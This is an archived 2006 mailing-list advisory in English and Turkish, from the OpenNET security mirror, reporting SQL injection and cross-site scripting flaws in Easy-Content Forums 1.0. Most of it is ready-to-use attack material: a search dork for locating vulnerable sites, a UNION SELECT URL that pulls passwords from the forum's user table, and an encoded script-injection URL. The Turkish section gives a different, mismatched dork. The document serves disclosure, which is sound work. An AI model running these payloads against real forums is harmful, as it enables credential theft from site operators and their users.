The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities


<< Previous INDEX Search src / Print Next >>
Date: 25 May 2006 07:03:24 -0000
From: [email protected]
To: [email protected]
Subject: Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru

ENGLISH

# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork   :   "Copyright 2004 easy-content forums"

# Author :   ajann

# Exploit;

SQL INJECT&#304;ON--------------------------------------------------------

###  http://&#091;target]/[path]/userview.asp?startletter=SQL TEXT

###  http://&#091;target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://&#091;target]/[path]/userview.asp?startletter=xss TEXT

### http://&#091;target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X


# ajann,Turkey


TURKISH

# Ba&#351;l&#305;k          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# SЖzcЭk[Arama]   :   "powered by phpmydirectory"
# AГ&#305;&#287;&#305; Bulan     :   ajann
# AГ&#305;k bulunan dosyalar;

SQL INJECT&#304;ON--------------------------------------------------------

###  http://&#091;target]/[path]/userview.asp?startletter=SQL SORGUNUZ

###  http://&#091;target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

жrnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://&#091;target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://&#091;target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

жrnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar&#305;s&#305; c&#305;kar&#305;cakt&#305;r.


Ac&#305;klama: 
userview.asp , topics.asp dosyalar&#305;nda bulunan filtreleme eksikli&#287;i nedeniyle sql sorgu cal&#305;st&#305;r&#305;labilmektedir.
userview.asp , topics.asp dosyalar&#305;nda bulunan filtreleme eksikli&#287;i nedeniyle xss kodlar&#305; cal&#305;sabilmektedir.

# ajann,Turkiye


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру